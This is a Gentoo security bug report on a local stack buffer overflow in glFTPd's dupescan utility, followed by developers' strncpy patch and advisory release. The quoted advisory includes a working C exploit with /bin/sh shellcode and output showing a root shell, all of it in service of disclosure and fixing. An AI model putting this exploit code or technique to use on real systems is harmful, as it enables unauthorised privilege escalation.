Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 64809 - net-ftp/glftpd: Local Stack Buffer Overflow Vulnerability
Summary: net-ftp/glftpd: Local Stack Buffer Overflow Vulnerability
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High normal (vote)
Assignee: Gentoo Security
URL: http://www.nosystem.com.ar/advisories...
Whiteboard: C1 [glsa] lewk
Keywords:
Depends on:
Blocks:
 
Reported: 2004-09-20 17:27 UTC by Luke Macken (RETIRED)
Modified: 2011-10-30 22:39 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---


Attachments
1.32-stack-overflow.patch (1.32-stack-overflow.patch,396 bytes, patch)
2004-09-20 18:24 UTC, SpanKY
no flags Details | Diff

Note You need to log in before you can comment on or make changes to this bug.
Description Luke Macken (RETIRED) gentoo-dev 2004-09-20 17:27:39 UTC
-------------------------------------------------
No System Group - Advisory #05 - 18/09/04
-------------------------------------------------
Program:  glFTPd
Homepage:  http://www.glftpd.com
Vulnerable Versions: glFTPd v2.00RC3 and prior
Risk: Low / Medium
Impact: Local Stack Buffer Overflow Vulnerability
-------------------------------------------------


- DESCRIPTION
-------------------------------------------------
glFTPd is a very advanced ftp server with lots of 
possibilities. One of the main differences between 
many other ftp servers and glFTPd is that it has its 
own user database which can be completely maintained 
online using ftp site commands. Using ftp site commands 
it is also possible to see stats, view logs, execute 
scripts and do many more things. glFTPd runs within 
a chroot environment which makes it relatively safe. 
The glFTPd team continuously works on improving this 
free piece of beautiful software.

More informations at: http://www.glftpd.com


- DETAILS
-------------------------------------------------
This vulnerability is caused by an unsafe strcpy() 
that copies the entire parameter of the 'dupescan' 
to a stack buffer of 255 bytes.


--- dupescan.c ---
39: int main (int argc, char *argv[]) {
40:   FILE *fp;
41:   char dupename[255], dupefile[255], Temp[255];
42:   struct dupefile buffer;
43:   if (argc == 1){
44:     printf("USAGE: %s <filename>\n", argv[0]);
45:     return 0;
46:   }
47: 
48:   read_conf_datapath(Temp);
49:   sprintf(dupefile, "%s/logs/dupefile", Temp);
50: 
51:   strcpy(dupename, argv[1]); <----- THE BUG
52:   if((fp = fopen(dupefile, "r")) == NULL)
53:     return 0;
54: 
--- dupescan.c ---

coki@nosystem:~$ /glftpd/bin/dupescan `perl -e 'print "A" x 300'`
Done
Segmentation fault
coki@nosystem:~$

coki@nosystem:~$ gdb /glftpd/bin/dupescan
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 300'`
Starting program: /glftpd/bin/dupescan `perl -e 'print "A" x 300'`
Done

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) quit
The program is running.  Exit anyway? (y or n) y
coki@nosystem:~$

- EXPLOIT
-------------------------------------------------

-------------- glFTPd-dupe_exp.c ----------------
/* glFTPd local stack buffer overflow exploit
   (Proof of Concept)

   Tested in Slackware 9.0 / 9.1 / 10.0

   by CoKi <coki@nosystem.com.ar>
   No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>
#include <strings.h>
#include <unistd.h>

#define BUFFER 288 + 1
#define PATH "/glftpd/bin/dupescan"

char shellcode[]=
	"\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
	"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
	"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
	"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(void) {

	char *env[3] = {shellcode, NULL};
	char buf[BUFFER], *path;
	int *buffer = (int *) (buf);
	int i;
	int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH);

	for(i=0; i<=BUFFER; i+=4)
	*buffer++ = ret;

	printf("\n glFTPd local stack buffer overflow (Proof of Concept)\n");
	printf(" by CoKi <coki@nosystem.com.ar>\n\n");

	execle(PATH, "dupescan", buf, NULL, env);
}

-------------- glFTPd-dupe_exp.c ----------------

coki@servidor:~$ make glFTPd-dupe_exp
coki@servidor:~$ ./glFTPd-dupe_exp

 glFTPd local stack buffer overflow (Proof of Concept)
 by CoKi <coki@nosystem.com.ar>

Done
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),11(floppy),17(audio),18(video),19(cdrom)
sh-2.05b#

'dupescan' is not setuid by default :(


- SOLUTIONS
-------------------------------------------------
No yet

- REFERENCES
-------------------------------------------------
http://www.nosystem.com.ar/advisories/advisory-05.txt


- CREDITS
-------------------------------------------------
Discovered by CoKi <coki@nosystem.com.ar>

No System Group - http://www.nosystem.com.ar
Comment 1 Luke Macken (RETIRED) gentoo-dev 2004-09-20 17:40:11 UTC
no metadata for this package.  CC'ing vapier who seems to have been maintaining this ebuild.
Comment 2 SpanKY gentoo-dev 2004-09-20 18:24:09 UTC
Created attachment 40046 [details, diff]
1.32-stack-overflow.patch

does this look sane to people ?
Comment 3 SpanKY gentoo-dev 2004-09-20 19:01:22 UTC
updated the patch and released 1.32-r1 with x86 stable (ready for GLSA)

-  strcpy(dupename, argv[1]);
+  strncpy(dupename, argv[1], sizeof(dupename)-1);
+  dupename[sizeof(dupename)-1] = '\0';
Comment 4 Luke Macken (RETIRED) gentoo-dev 2004-09-20 20:16:09 UTC
GLSA is drafted.

security, please review.
Comment 5 Thierry Carrez (RETIRED) gentoo-dev 2004-09-21 13:50:26 UTC
GLSA 200409-27